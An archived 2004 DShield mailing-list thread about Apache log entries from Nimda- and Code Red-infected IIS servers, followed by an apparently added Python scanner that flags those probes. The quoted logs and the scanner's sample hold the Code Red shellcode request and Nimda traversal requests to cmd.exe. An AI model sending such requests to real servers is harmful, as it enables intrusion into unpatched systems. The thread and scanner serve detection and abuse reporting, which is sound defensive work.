[Dshield] Look at this Nitwit

Keith Bergen keith at keithbergen.com
Wed Jan 28 21:50:23 GMT 2004


Yes. That is a Windows IIS server that is infected with the 
Nimda virus and trying to propagate it to your box. There's 
probably not a lot you can do about it apart from sending an 
email to his provider with the logs. You may be able to block 
these requests at your firewall. As you are most likely 
aware, your Apache web server is not vulnerable to this 
attack.

I actually log these (and Code Red) attacks on my Apache 
server.

http://keithbergen.dyndns.org/cgi-bin/ac.pl

Hope this helps,
Keith.

---- Original message ----
>Date: Wed, 28 Jan 2004 15:42:43 -0500
>From: David Hart <DavidHart at TQMcube.com>  
>Subject: [Dshield] Look at this Nitwit  
>To: General DShield Discussion List <list at dshield.org>
>
>Apache log:
>
>pcp03063113pcs.newlaf01.mi.comcast.net - - [28/Jan/2004:07:51:32 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 987 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:26 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 906 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 906 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:31 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:31 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
>
>                               ---------
>            Quality Management - A Commitment to Excellence
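Added example (not Keith's script at the URL above, and not anything posted to the list): a small Python scanner that reads Apache access-log lines and flags the two worm patterns quoted in this thread, the Code Red request to /default.ida with %u-encoded payload and Nimda's fixed list of root.exe / cmd.exe URLs, then tallies hits per source host so the evidence can be handed to the provider as Keith suggests. The sample log text is constructed, modelled on the entries quoted above (the Code Red filler is shortened, and a benign request is added to show it is ignored). The double_decode helper illustrates why "..%255c.." is the double-URL-encoded form of "..\.." that vulnerable IIS builds decoded and Apache does not.

```python
import re
import urllib.parse
from collections import Counter

# Constructed sample, modelled on the Apache entries quoted in the post.
# The Code Red filler is shortened; the last line is a benign control request.
SAMPLE_LOG = r'''
pcp03063113pcs.newlaf01.mi.comcast.net - - [28/Jan/2004:07:51:32 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 987 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:26 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 906 "-" "-"
203.0.113.5 - - [28/Jan/2004:11:00:00 -0500] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
'''

# Apache common/combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Code Red: GET /default.ida?<filler> followed by %uXXXX-encoded payload.
CODE_RED_RE = re.compile(r'^/default\.ida\?.*%u[0-9a-f]{4}', re.IGNORECASE)

# Nimda walks a fixed list of URLs ending in root.exe or winnt/system32/cmd.exe,
# reached through double URL encoding (%255c) or overlong UTF-8 sequences
# (%c0%af, %c1%1c, %c1%9c) that IIS canonicalised into "..\" or "../".
# Matching on the target executable catches every variant in the post;
# note Apache answered the malformed "%%35%63" forms with 400, not 404.
NIMDA_RE = re.compile(r'/root\.exe\?|/winnt/system32/cmd\.exe\?', re.IGNORECASE)


def double_decode(path):
    """Decode the path twice, as vulnerable IIS effectively did.

    '/scripts/..%255c../x' -> '/scripts/..%5c../x' -> '/scripts/..\\../x'
    """
    return urllib.parse.unquote(urllib.parse.unquote(path))


def classify(path):
    """Return 'code-red', 'nimda', or None for a request path."""
    if CODE_RED_RE.search(path):
        return 'code-red'
    if NIMDA_RE.search(path):
        return 'nimda'
    return None


def scan(log_text):
    """Return (findings, per_host): one tuple per worm probe, plus a tally
    keyed by (source host, label) suitable for an abuse report."""
    findings = []
    per_host = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or non-Apache line
        label = classify(m['path'])
        if label is None:
            continue  # ordinary traffic
        findings.append((m['host'], m['time'], label, int(m['status'])))
        per_host[(m['host'], label)] += 1
    return findings, per_host


if __name__ == '__main__':
    hits, tally = scan(SAMPLE_LOG)
    for host_label, count in sorted(tally.items()):
        print(f'{host_label[0]:45} {host_label[1]:9} {count}')
    for h in hits:
        print(h)
```

The scanner matches on the executable the worm is trying to reach rather than on each encoding trick, so the sixteen traversal spellings in the post all collapse to one rule; the tally per (host, label) is what you would paste into the note to the provider.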